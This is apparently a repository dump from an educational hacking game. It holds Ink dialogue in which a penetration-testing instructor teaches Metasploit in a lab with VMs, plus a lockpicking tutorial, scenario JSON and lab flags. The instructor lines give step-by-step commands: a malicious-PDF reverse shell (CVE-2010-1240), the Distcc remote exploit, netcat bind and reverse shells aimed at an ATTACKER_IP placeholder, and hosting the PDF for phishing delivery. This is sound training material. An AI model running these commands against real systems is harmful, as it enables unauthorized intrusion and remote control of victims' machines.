~ instructor_rapport += 5
+ [What's the typical workflow for using an exploit?]
Penetration Testing Instructor: Great question. Here's the standard process:
Penetration Testing Instructor: First, specify the exploit to use. Second, set options for the exploit like the IP address to attack. Third, choose a payload - this defines what happens on the compromised system.
Penetration Testing Instructor: Optionally, you can choose encoding to evade security monitoring like anti-malware or intrusion detection systems.
Penetration Testing Instructor: Finally, launch the exploit and see if it succeeds.
Penetration Testing Instructor: The flexibility to combine any exploit with different payloads and encoding is what makes Metasploit so powerful.
~ instructor_rapport += 5
+ [Tell me more about msfconsole]
-> msfconsole_basics
- -> vulnerability_hub
=== msfconsole_basics ===
Penetration Testing Instructor: Msfconsole is the interactive console interface that many consider the preferred way to use Metasploit.
~ instructor_rapport += 5
Penetration Testing Instructor: Start it by simply running "msfconsole" - though it may take a moment to load.
Penetration Testing Instructor: Once it's running, you have access to all of Metasploit's features through an interactive command line.
+ [What commands should I know?]
Penetration Testing Instructor: Let me give you the essentials:
Penetration Testing Instructor: "help" shows all available commands. "show exploits" lists all exploit modules. "show payloads" lists available payloads.
Penetration Testing Instructor: "use exploit/path/to/exploit" selects an exploit. "show options" displays what needs to be configured.
Penetration Testing Instructor: "set OPTION_NAME value" configures an option. "exploit" or "run" launches the attack.
Penetration Testing Instructor: "back" returns you to the main context if you want to change exploits.
~ instructor_rapport += 5
+ [Can I run regular shell commands too?]
Penetration Testing Instructor: Yes! You can run local programs directly from msfconsole, similar to a standard shell.
Penetration Testing Instructor: For example, "ls /home/kali" works just fine from within msfconsole.
Penetration Testing Instructor: This is convenient because you don't need to exit msfconsole to check files or run quick commands.
~ instructor_rapport += 5
+ [Does it have tab completion?]
Penetration Testing Instructor: Absolutely! Msfconsole has excellent tab completion support.
Penetration Testing Instructor: You can press TAB while typing exploit paths, options, or commands to autocomplete them.
Penetration Testing Instructor: You can also use UP and DOWN arrow keys to navigate through your command history.
Penetration Testing Instructor: These features make it much faster to work with Metasploit.
~ instructor_rapport += 5
- -> vulnerability_hub
=== local_exploits ===
Penetration Testing Instructor: Local exploits target applications running on the victim's computer, rather than network services.
~ instructor_rapport += 5
Penetration Testing Instructor: These often require some social engineering to get the victim to open a malicious file or visit a malicious website.
Penetration Testing Instructor: A classic example is the Adobe PDF Escape EXE vulnerability (CVE-2010-1240). This affected Adobe Reader versions before 8.1.2.
+ [How does the PDF exploit work?]
Penetration Testing Instructor: You craft a malicious PDF document that exploits a vulnerability in how Adobe Reader processes embedded executables.
Penetration Testing Instructor: When the victim opens the PDF, they're prompted to execute a payload with a message that encourages them to click "Open."
Penetration Testing Instructor: If they click it, your payload executes on their system with their privileges.
Penetration Testing Instructor: The Metasploit module is "exploit/windows/fileformat/adobe_pdf_embedded_exe"
~ instructor_rapport += 5
+ [Walk me through creating a malicious PDF]
Penetration Testing Instructor: Sure! In msfconsole, start with:
Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe
Penetration Testing Instructor: Then set the filename: set FILENAME timetable.pdf
Penetration Testing Instructor: Choose a payload: set PAYLOAD windows/shell/reverse_tcp
Penetration Testing Instructor: Configure where to connect back: set LHOST YOUR_IP and set LPORT YOUR_PORT
Penetration Testing Instructor: Finally, run the exploit to generate the malicious PDF.
Penetration Testing Instructor: To receive the reverse shell, you need to set up a handler before the victim opens the PDF.
~ instructor_rapport += 5
+ [How do I set up the handler to receive the connection?]
Penetration Testing Instructor: Good question! You use the multi/handler exploit:
Penetration Testing Instructor: use exploit/multi/handler
Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp
Penetration Testing Instructor: set LHOST YOUR_IP
Penetration Testing Instructor: set LPORT YOUR_PORT (must match what you used in the PDF)
Penetration Testing Instructor: Then run it and leave it listening. When the victim opens the PDF and clicks through, you'll get a shell!
~ instructor_rapport += 5
+ [How would I deliver this PDF to a victim?]
Penetration Testing Instructor: In a real penetration test, you might host it on a web server and send a phishing email with a link.
Penetration Testing Instructor: For the lab, you can start Apache web server and host the PDF there.
Penetration Testing Instructor: Create a share directory: sudo mkdir /var/www/html/share
Penetration Testing Instructor: Copy your PDF there: sudo cp /home/kali/.msf4/local/timetable.pdf /var/www/html/share/
Penetration Testing Instructor: Start Apache: sudo service apache2 start
Penetration Testing Instructor: Then the victim can browse to http://YOUR_IP/share/timetable.pdf
~ instructor_rapport += 5
- -> vulnerability_hub
=== remote_exploits ===
Penetration Testing Instructor: Remote exploits are even more dangerous because they target network services directly exposed to the Internet.
~ instructor_rapport += 5
Penetration Testing Instructor: No social engineering required - if the vulnerable service is accessible, you can often compromise it without any user interaction!
Penetration Testing Instructor: A great example is the Distcc vulnerability (CVE-2004-2687). Distcc is a program to distribute compilation of C/C++ code across systems on a network.
+ [What makes Distcc vulnerable?]
Penetration Testing Instructor: Distcc has a documented security issue where anyone who can connect to the port can execute arbitrary commands as the distcc user.
Penetration Testing Instructor: There's no authentication, no authorization checks. If you can reach the port, you can run commands. It's that simple.
Penetration Testing Instructor: This is a design flaw - the software was built for trusted networks and doesn't include any security controls.
~ instructor_rapport += 5
+ [How do I exploit Distcc with Metasploit?]
Penetration Testing Instructor: The exploit module is exploit/unix/misc/distcc_exec. Let me walk you through it:
Penetration Testing Instructor: First, use the exploit: use exploit/unix/misc/distcc_exec
Penetration Testing Instructor: Set the target: set RHOST VICTIM_IP
Penetration Testing Instructor: Choose a payload: set PAYLOAD cmd/unix/reverse
Penetration Testing Instructor: Configure your listener: set LHOST YOUR_IP and set LPORT YOUR_PORT
Penetration Testing Instructor: Then launch: exploit
Penetration Testing Instructor: Unlike the PDF exploit, msfconsole automatically starts the reverse shell handler for remote exploits!
~ instructor_rapport += 5
+ [Can I check if a target is vulnerable first?]
Penetration Testing Instructor: Great thinking! Some Metasploit exploits support a "check" command.
Penetration Testing Instructor: After setting your options, run "check" to see if the target appears vulnerable.
Penetration Testing Instructor: Not all exploits support this, and it's not 100% reliable, but it's worth trying.
Penetration Testing Instructor: For Distcc specifically, the check function isn't supported, but trying it doesn't hurt.
~ instructor_rapport += 5
+ [What level of access do I get?]
Penetration Testing Instructor: With Distcc, you typically get user-level access as the "distccd" user.
Penetration Testing Instructor: You won't have root (administrator) access initially, but you can access anything that user can access.
Penetration Testing Instructor: From there, you might attempt privilege escalation to gain root access, which is often the ultimate goal on Unix systems.
Penetration Testing Instructor: Even without root, a compromised user account can cause significant damage.
~ instructor_rapport += 5
+ [How can I make the shell more usable?]
Penetration Testing Instructor: The initial shell from cmd/unix/reverse is quite basic. You can upgrade it to an interactive shell:
Penetration Testing Instructor: Run: python -c 'import pty; pty.spawn("/bin/bash")'
Penetration Testing Instructor: This spawns a proper bash shell with better command line editing and behavior.
Penetration Testing Instructor: Then you'll have a more normal feeling shell prompt to work with.
~ instructor_rapport += 5
- -> vulnerability_hub
=== commands_reference ===
Penetration Testing Instructor: Let me give you a comprehensive commands reference for this lab.
~ instructor_rapport += 5
Penetration Testing Instructor: Listing Metasploit Payloads:
Penetration Testing Instructor: msfvenom -l payload pipe to less
Penetration Testing Instructor: Bind Shell Simulation with Netcat:
Penetration Testing Instructor: On victim: nc.exe -l -p 31337 -e cmd.exe -vv
Penetration Testing Instructor: On attacker: nc VICTIM_IP 31337
+ [Show me reverse shell commands]
Penetration Testing Instructor: **Reverse Shell with Netcat:**
Penetration Testing Instructor: On attacker: nc -l -p 53 -vv
Penetration Testing Instructor: On victim: nc.exe ATTACKER_IP 53 -e cmd.exe -vv
~ instructor_rapport += 3
+ [Show me msfconsole basics]
Penetration Testing Instructor: **Msfconsole Basics:**
Penetration Testing Instructor: Start console: msfconsole
Penetration Testing Instructor: Get help: help
Penetration Testing Instructor: List exploits: show exploits
Penetration Testing Instructor: List payloads: show payloads
Penetration Testing Instructor: Get exploit info: info exploit/path/to/exploit
Penetration Testing Instructor: Select exploit: use exploit/path/to/exploit
Penetration Testing Instructor: Show options: show options
Penetration Testing Instructor: Set option: set OPTION_NAME value
Penetration Testing Instructor: Go back: back
Penetration Testing Instructor: Run exploit: exploit or run
~ instructor_rapport += 3
+ [Show me the Adobe PDF exploit commands]
Penetration Testing Instructor: **Adobe PDF Exploit (CVE-2010-1240):**
Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe
Penetration Testing Instructor: set FILENAME timetable.pdf
Penetration Testing Instructor: set PAYLOAD windows/shell/reverse_tcp
Penetration Testing Instructor: set LHOST YOUR_KALI_IP
Penetration Testing Instructor: set LPORT 4444
Penetration Testing Instructor: run
Penetration Testing Instructor: **Set up handler:**
Penetration Testing Instructor: use exploit/multi/handler
Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp
Penetration Testing Instructor: set LHOST YOUR_KALI_IP
Penetration Testing Instructor: set LPORT 4444
Penetration Testing Instructor: run
~ instructor_rapport += 3
+ [Show me the Distcc exploit commands]
Penetration Testing Instructor: **Distcc Remote Exploit (CVE-2004-2687):**
Penetration Testing Instructor: use exploit/unix/misc/distcc_exec
Penetration Testing Instructor: set RHOST VICTIM_IP
Penetration Testing Instructor: set PAYLOAD cmd/unix/reverse
Penetration Testing Instructor: set LHOST YOUR_KALI_IP
Penetration Testing Instructor: set LPORT 4444
Penetration Testing Instructor: check (to see if target is vulnerable)
Penetration Testing Instructor: exploit
Penetration Testing Instructor: **Upgrade to interactive shell:**
Penetration Testing Instructor: python -c 'import pty; pty.spawn("/bin/bash")'
~ instructor_rapport += 3
+ [Show me web server setup for hosting payloads]
Penetration Testing Instructor: **Web Server Setup:**
Penetration Testing Instructor: Create share directory: sudo mkdir /var/www/html/share
Penetration Testing Instructor: Copy payload: sudo cp /home/kali/.msf4/local/filename.pdf /var/www/html/share/
Penetration Testing Instructor: Start Apache: sudo service apache2 start
Penetration Testing Instructor: Access from victim: http://KALI_IP/share/filename.pdf
~ instructor_rapport += 3
+ [Show me useful post-exploitation commands]
Penetration Testing Instructor: **Post-Exploitation Commands:**
Penetration Testing Instructor: Windows: whoami, dir, net user, ipconfig, systeminfo
Penetration Testing Instructor: Linux: whoami, ls -la, uname -a, ifconfig, cat /etc/passwd
Penetration Testing Instructor: Navigate: cd DIRECTORY
Penetration Testing Instructor: Create file: echo TEXT > filename.txt
Penetration Testing Instructor: Open browser (Windows): explorer "https://example.com"
~ instructor_rapport += 3
+ [Show me how to find network IPs]
Penetration Testing Instructor: **Finding IP Addresses:**
Penetration Testing Instructor: On Kali: ifconfig or hostname -I
Penetration Testing Instructor: On Windows: ipconfig
Penetration Testing Instructor: Note the host-only network interfaces that start with the same 3 octets.
~ instructor_rapport += 3
- -> vulnerability_hub
=== challenge_tips ===
Penetration Testing Instructor: Let me give you some practical tips for succeeding in the challenge.
~ instructor_rapport += 5
Penetration Testing Instructor: **For the Adobe PDF exploit:**
Penetration Testing Instructor: Make sure you set up the handler BEFORE the victim opens the PDF. The reverse shell will try to connect immediately.
Penetration Testing Instructor: The LHOST and LPORT must match between the PDF generation and the handler.
Penetration Testing Instructor: On Windows, use Adobe Reader specifically, not Chrome's built-in PDF viewer, since we're exploiting Adobe Reader's vulnerability.
+ [What if the PDF exploit doesn't work?]
Penetration Testing Instructor: First, check that Windows firewall isn't blocking the connection. Usually it won't block outbound connections, but double-check.
Penetration Testing Instructor: Verify your IP addresses are correct - use the host-only network addresses that start with the same three octets.
Penetration Testing Instructor: Make sure your handler is actually running when the victim opens the PDF.
Penetration Testing Instructor: Check that you're opening with Adobe Reader, not another PDF viewer.
~ instructor_rapport += 5
+ [Tips for the Distcc exploit?]
Penetration Testing Instructor: The Linux victim VM is the server running Distcc. You can't open it directly - that's expected.
Penetration Testing Instructor: The IP address typically ends in .3 and starts with the same three octets as your Kali and Windows VMs.
Penetration Testing Instructor: After you get shell access, remember you can upgrade to an interactive shell with that Python one-liner.
Penetration Testing Instructor: Look in the distccd user's home directory for the flag file.
~ instructor_rapport += 5
+ [General troubleshooting advice?]
Penetration Testing Instructor: Always double-check your IP addresses. Getting the wrong IP is the most common mistake.
Penetration Testing Instructor: Pay attention to whether you need LHOST (local host - your Kali IP) or RHOST (remote host - victim IP).
Penetration Testing Instructor: If something doesn't work, run "show options" again to verify all settings before running the exploit.
Penetration Testing Instructor: Use ifconfig to check your Kali IP and ipconfig to check Windows IP.
~ instructor_rapport += 5
+ [What should I do once I have shell access?]
Penetration Testing Instructor: First, verify you have access by running basic commands like "whoami" and "dir" or "ls".
Penetration Testing Instructor: Navigate to the user's home directory and look for flag files.
Penetration Testing Instructor: For the PDF exploit, the flag might be on the Desktop or in the user's home folder.
Penetration Testing Instructor: For Distcc, look in /home for user directories, then search for flag files.
Penetration Testing Instructor: Read the flag with "cat flag" or "type flag" on Windows.
~ instructor_rapport += 5
- -> vulnerability_hub
=== ready_for_practice ===
Penetration Testing Instructor: Excellent! You're ready to start the practical exercises.
~ instructor_rapport += 10
~ exploitation_ethics += 10
Penetration Testing Instructor: Remember: the knowledge you've gained about vulnerabilities and exploitation is powerful. Use it only for authorized security testing, penetration testing engagements, and defensive purposes.
Penetration Testing Instructor: Understanding how attacks work makes you a better defender. But wielding these tools without authorization is both illegal and unethical.
Penetration Testing Instructor: In the lab environment, you'll practice both local exploits (the Adobe PDF vulnerability) and remote exploits (the Distcc vulnerability).
+ [Any final advice before I start?]
Penetration Testing Instructor: Take your time and read the error messages carefully. Metasploit is verbose and will tell you what went wrong.
Penetration Testing Instructor: Use tab completion and command history to work more efficiently.
Penetration Testing Instructor: Document what you're doing as you go - it helps with troubleshooting and writing reports later.
Penetration Testing Instructor: Most importantly: if you get stuck, check "show options" to verify your settings, and make sure your IP addresses are correct.
Penetration Testing Instructor: Good luck, Agent {player_name}. This is where theory meets practice.
~ instructor_rapport += 10
- -> vulnerability_hub
-> vulnerability_hub

1
scenarios/lab_vulnerabilities/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

89
scenarios/lab_vulnerabilities/ink/locksmith.ink Normal file
View File

@@ -0,0 +1,89 @@
// ===========================================
// LOCKSMITH NPC - LOCKPICKING TUTORIAL
// ===========================================
// NPC item inventory variables
VAR has_lockpick = false
// Progress tracking
VAR lockpicking_tutorial_given = false
VAR all_locks_picked = false
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
Welcome to the lockpicking practice room. I'm here to teach you the fundamentals of lockpicking.
{has_lockpick:
Here's a professional lockpick set to get you started.
#give_item:lockpick
#complete_task:talk_to_locksmith
#unlock_task:pick_all_locks
- else:
I see you already have a lockpick set.
}
-> hub
// ===========================================
// MAIN HUB
// ===========================================
=== hub ===
What would you like to know?
{not lockpicking_tutorial_given:
* [Can you teach me about lockpicking?]
-> lockpicking_tutorial
}
{lockpicking_tutorial_given and not all_locks_picked:
+ [I'm working on picking the locks]
You'll find five locked containers in this room. Each one contains a document fragment. Pick all five to complete the practice exercise.
-> hub
}
+ [That's all I need] #exit_conversation
Good luck with your practice. Come back if you need any tips!
-> hub
// ===========================================
// LOCKPICKING TUTORIAL
// ===========================================
=== lockpicking_tutorial ===
~ lockpicking_tutorial_given = true
Lockpicking is a physical security skill that's essential for field operations. Here's how it works:
Most locks use pin tumblers. Each pin has two parts - a driver pin and a key pin. When the correct key is inserted, the pins align at the shear line, allowing the lock to turn.
When picking a lock, you need two tools: a tension wrench that applies rotational pressure to the lock cylinder, and a pick that manipulates the pins one by one.
The technique involves applying light tension with the wrench in the direction the lock turns, then using the pick to push each pin up until you feel it "bind" (stop moving). Pins bind in a specific order, so you work through them systematically. When all pins are set at the shear line, the lock will turn.
Practice makes perfect. Start with the containers in this room - they have different difficulty levels. Each container has a different lock configuration. Start with the easier ones and work your way up. When you've picked all five locks and collected all the documents, come back and I'll congratulate you on completing the practice.
Good luck!
-> hub
// ===========================================
// LOCKPICKING COMPLETE
// ===========================================
=== lockpicking_complete ===
~ all_locks_picked = true
Congratulations! You've successfully picked all five locks and recovered all the lost documents.
You've demonstrated understanding of lock mechanics, ability to apply proper tension, skill in identifying binding order, and patience and precision. These skills will serve you well in the field. Lockpicking is often the difference between mission success and failure when you need access without leaving evidence of forced entry.
You're ready for real-world operations. Well done, Agent.
-> hub

1
scenarios/lab_vulnerabilities/ink/locksmith.json Normal file
View File

@@ -0,0 +1 @@
{"inkVersion":21,"root":[[["done",{"#n":"g-0"}],null],"done",{"start":["^Welcome to the lockpicking practice room. I'm here to teach you the fundamentals of lockpicking.","\n","ev",{"VAR?":"has_lockpick"},"/ev",[{"->":".^.b","c":true},{"b":["\n","^Here's a professional lockpick set to get you started.","\n","#","^give_item:lockpick","/#","#","^complete_task:talk_to_locksmith","/#","#","^unlock_task:pick_all_locks","/#",{"->":"start.7"},null]}],[{"->":".^.b"},{"b":["\n","^I see you already have a lockpick set.","\n",{"->":"start.7"},null]}],"nop","\n",{"->":"hub"},null],"hub":[["^What would you like to know?","\n","ev",{"VAR?":"lockpicking_tutorial_given"},"!","/ev",[{"->":".^.b","c":true},{"b":["\n","ev","str","^Can you teach me about lockpicking?","/str","/ev",{"*":".^.c-0","flg":20},{"->":"hub.0.7"},{"c-0":["\n",{"->":"lockpicking_tutorial"},{"#f":5}]}]}],"nop","\n","ev",{"VAR?":"lockpicking_tutorial_given"},{"VAR?":"all_locks_picked"},"!","&&","/ev",[{"->":".^.b","c":true},{"b":["\n","ev","str","^I'm working on picking the locks","/str","/ev",{"*":".^.c-0","flg":4},{"->":"hub.0.16"},{"c-0":["\n","^You'll find five locked containers in this room. Each one contains a document fragment. Pick all five to complete the practice exercise.","\n",{"->":"hub"},null]}]}],"nop","\n","ev","str","^That's all I need","/str","/ev",{"*":".^.c-0","flg":4},{"c-0":["^ ","#","^exit_conversation","/#","\n","^Good luck with your practice. Come back if you need any tips!","\n",{"->":"hub"},null]}],null],"lockpicking_tutorial":["ev",true,"/ev",{"VAR=":"lockpicking_tutorial_given","re":true},"^Lockpicking is a physical security skill that's essential for field operations. Here's how it works:","\n","^Most locks use pin tumblers. Each pin has two parts - a driver pin and a key pin. When the correct key is inserted, the pins align at the shear line, allowing the lock to turn.","\n","^When picking a lock, you need two tools: a tension wrench that applies rotational pressure to the lock cylinder, and a pick that manipulates the pins one by one.","\n","^The technique involves applying light tension with the wrench in the direction the lock turns, then using the pick to push each pin up until you feel it \"bind\" (stop moving). Pins bind in a specific order, so you work through them systematically. When all pins are set at the shear line, the lock will turn.","\n","^Practice makes perfect. Start with the containers in this room - they have different difficulty levels. Each container has a different lock configuration. Start with the easier ones and work your way up. When you've picked all five locks and collected all the documents, come back and I'll congratulate you on completing the practice.","\n","^Good luck!","\n",{"->":"hub"},null],"lockpicking_complete":["ev",true,"/ev",{"VAR=":"all_locks_picked","re":true},"^Congratulations! You've successfully picked all five locks and recovered all the lost documents.","\n","^You've demonstrated understanding of lock mechanics, ability to apply proper tension, skill in identifying binding order, and patience and precision. These skills will serve you well in the field. Lockpicking is often the difference between mission success and failure when you need access without leaving evidence of forced entry.","\n","^You're ready for real-world operations. Well done, Agent.","\n",{"->":"hub"},null],"global decl":["ev",false,{"VAR=":"has_lockpick"},false,{"VAR=":"lockpicking_tutorial_given"},false,{"VAR=":"all_locks_picked"},"/ev","end",null]}],"listDefs":{}}

21
scenarios/lab_vulnerabilities/mission.json Normal file
View File

@@ -0,0 +1,21 @@
{
"display_name": "Vulnerabilities, Exploits, and Remote Access Payloads",
"description": "Explore software vulnerabilities, learn about exploits and payloads, and gain hands-on experience with the Metasploit framework. Practice both local and remote exploits in a controlled lab environment.",
"difficulty_level": 2,
"secgen_scenario": "labs/introducing_attacks/3_vulnerabilities.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "MAT",
"topic": "Attacks and exploitation",
"keywords": ["EXPLOITATION", "EXPLOITATION FRAMEWORKS"]
},
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": ["PENETRATION TESTING - SOFTWARE TOOLS", "PENETRATION TESTING - ACTIVE PENETRATION"]
}
]
}

171
scenarios/lab_vulnerabilities/scenario.json.erb Normal file
View File

@@ -0,0 +1,171 @@
{
"scenario_brief": "Welcome to the Vulnerabilities, Exploits, and Remote Access Payloads Lab! Your penetration testing instructor will guide you through software vulnerabilities, exploits, payloads, and the Metasploit framework. Practice both local and remote exploits in a controlled VM lab environment.",
"endGoal": "Complete the lab instruction with the penetration testing instructor, launch the VMs, and capture the flag from the Linux victim server to demonstrate your understanding of vulnerability exploitation.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"distcc_flag_submitted": false
},
"objectives": [
{
"aimId": "complete_vm_lab",
"title": "Complete VM Lab Exercises",
"description": "Capture the flag from the Linux victim server",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "submit_all_flags",
"title": "Submit the flag from Linux victim server",
"type": "submit_flags",
"targetFlags": ["linux_victim_server-flag1"],
"targetCount": 1,
"currentCount": 0,
"showProgress": true,
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "tech_instructor",
"displayName": "Penetration Testing Instructor",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_vulnerabilities/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 3000,
"targetKnot": "intro_timed"
},
"eventMappings": [],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/introducing_attacks/3-vulnerabilities/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the Vulnerabilities, Exploits, and Remote Access Payloads Lab!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VMs and practice exploitation techniques\n4. Capture the flag from the Linux victim server\n\nThe penetration testing instructor is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VMs in the VM Lab Room:\n - Kali VM Terminal: Your attacker machine with Metasploit framework\n - Windows Victim VM Terminal: Target for local exploits (PDF vulnerability)\n - Linux Victim Server Terminal: Target for remote exploits (Distcc vulnerability)\n\n2. Your objectives:\n - Practice local exploits: Create a malicious PDF and exploit the Windows victim\n - Practice remote exploits: Exploit the Distcc vulnerability on the Linux server\n - Capture the flag from the Linux victim server\n\n3. Submit the flag at the Flag Submission Terminal in the VM Lab Room\n\nFlag to capture:\n- flag from Linux victim server - After successfully exploiting the Distcc vulnerability\n\nRemember what the instructor taught you about exploits and payloads!",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_kali",
"name": "Kali VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Kali Linux attacker machine with Metasploit framework",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('vulnerabilities_exploits_remote_access', {
"id": 1,
"title": "kali",
"ip": "172.16.0.4",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_windows_victim",
"name": "Windows Victim VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Windows victim system for local exploit practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('vulnerabilities_exploits_remote_access', {
"id": 2,
"title": "windows_victim",
"ip": "172.16.0.2",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_linux_victim_server",
"name": "Linux Victim Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the Linux victim server for remote exploit practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('vulnerabilities_exploits_remote_access', {
"id": 3,
"title": "linux_victim_server",
"ip": "172.16.0.3",
"enable_console": true
}) %>
},
{
"type": "flag-station",
"id": "flag_station_lab",
"name": "Lab Flag Submission Terminal",
"takeable": false,
"observations": "Submit flags captured from the Linux victim server here",
"acceptsVms": ["linux_victim_server"],
"flags": <%= flags_for_vm('linux_victim_server', [
'flag{distcc_exploit_success}'
]) %>,
"flagRewards": [
{
"type": "emit_event",
"event_name": "distcc_flag_submitted",
"description": "Distcc exploit flag submitted - demonstrates remote exploitation skills"
}
]
}
]
}
}
}

631
scenarios/lab_vulnerability_analysis/ink/instructor.ink Normal file
View File

@@ -0,0 +1,631 @@
// ===========================================
// VULNERABILITY ANALYSIS LAB
// Vulnerability Analysis
// ===========================================
// Game-Based Learning replacement for lab sheet
// Original: introducing_attacks/8_vulnerability_analysis.md
// Based on HacktivityLabSheets: introducing_attacks/8_vulnerability_analysis.md
// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw
// License: CC BY-SA 4.0
// ===========================================
// Global persistent state
VAR instructor_rapport = 0
VAR vuln_scanning_mastery = 0
// Global variables (synced from scenario.json.erb)
VAR player_name = "Agent 0x00"
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
~ instructor_rapport = 0
~ vuln_scanning_mastery = 0
Welcome back, {player_name}. What would you like to discuss?
-> vuln_scan_hub
// ===========================================
// TIMED INTRO CONVERSATION (Game Start)
// ===========================================
=== intro_timed ===
~ instructor_rapport = 0
~ vuln_scanning_mastery = 0
Welcome to Vulnerability Analysis, {player_name}. I'm your vulnerability assessment specialist instructor for this session.
Vulnerability assessment is critical for efficiently identifying security weaknesses in systems before attackers find them. While penetration testing involves manually researching and exploiting vulnerabilities, vulnerability scanning is an automated approach that quickly surveys systems for known security issues.
You'll learn to use industry-standard tools like Nmap NSE, Nessus, and Nikto - understanding their strengths, limitations, and when to use each.
Remember: these are powerful reconnaissance tools. Use them only on systems you're authorized to assess.
~ vuln_scanning_mastery += 10
#influence_increased
Let me explain how this lab works. You'll find three key resources here:
First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.
Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine and a Linux server for hands-on vulnerability assessment practice.
Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.
You can talk to me anytime to explore vulnerability assessment concepts, get tips, or ask questions about the material. I'm here to help guide your learning.
Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.
-> vuln_scan_hub
=== vuln_scan_hub ===
What aspect of vulnerability assessment would you like to explore?
+ [What is vulnerability scanning?]
-> vuln_scanning_intro
+ [Vulnerability scanning vs penetration testing]
-> scanning_vs_pentesting
+ [Nmap Scripting Engine (NSE)]
-> nmap_nse
+ [Using Nessus vulnerability scanner]
-> nessus_scanner
+ [Web vulnerability scanning with Nikto]
-> nikto_scanner
+ [Limitations of automated tools]
-> tool_limitations
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> vuln_scan_hub
=== vuln_scanning_intro ===
Vulnerability scanning is an automated approach to identifying security weaknesses in systems.
~ instructor_rapport += 5
#influence_increased
Scanners typically perform or import network scans like port scans and service identification, then automatically check whether detected services contain known vulnerabilities.
They compare detected service versions against databases of known vulnerabilities - similar to what you did manually using CVE databases.
+ [How do vulnerability scanners work?]
Most vulnerability scanners follow a standard process:
First, they conduct or import a port scan to identify running services and their versions.
Then they compare this information against databases of known vulnerabilities for those specific versions.
Many also send probes to confirm vulnerabilities actually exist, not just assume based on version numbers.
Some tests are potentially dangerous and might crash services, so most scanners offer a "safe mode" to avoid risky checks.
~ instructor_rapport += 5
#influence_increased
+ [Why use automated scanning?]
Automated scanning has several advantages:
It's fast - scanning hundreds of systems in the time it would take to manually test one.
It's comprehensive - checking for thousands of known vulnerabilities systematically.
It's repeatable - you can regularly rescan to catch newly introduced vulnerabilities.
It reduces the risk of human error or overlooking obvious issues.
However, it also has significant limitations we'll discuss.
~ instructor_rapport += 5
#influence_increased
- -> vuln_scan_hub
=== scanning_vs_pentesting ===
Penetration testing and vulnerability scanning are complementary but distinct approaches.
~ instructor_rapport += 5
#influence_increased
Penetration testing involves manual research, planning, and actual exploitation of vulnerabilities. It's deeper but slower.
Vulnerability scanning is automated, faster, and broader but shallower.
+ [What are the advantages of penetration testing?]
Penetration testing has several key advantages:
Very few false positives - if a tester successfully exploits a vulnerability, it's definitely real.
Testers can chain vulnerabilities together in creative ways automated tools can't imagine.
Human intuition can spot logical flaws and business logic vulnerabilities that scanners miss.
However, there's always risk that an exploit may cause unintentional damage.
And even skilled testers might miss something obvious if they're checking things manually.
~ instructor_rapport += 5
#influence_increased
+ [What are the advantages of vulnerability scanning?]
Vulnerability scanning excels at:
Speed - scanning entire networks in hours instead of days or weeks.
Coverage - systematically checking for thousands of known vulnerabilities.
Safety - tests can be configured to avoid dangerous probes that might crash services.
Consistency - same tests run the same way every time.
Cost-effectiveness - after initial setup, scanning is cheap to repeat regularly.
~ instructor_rapport += 5
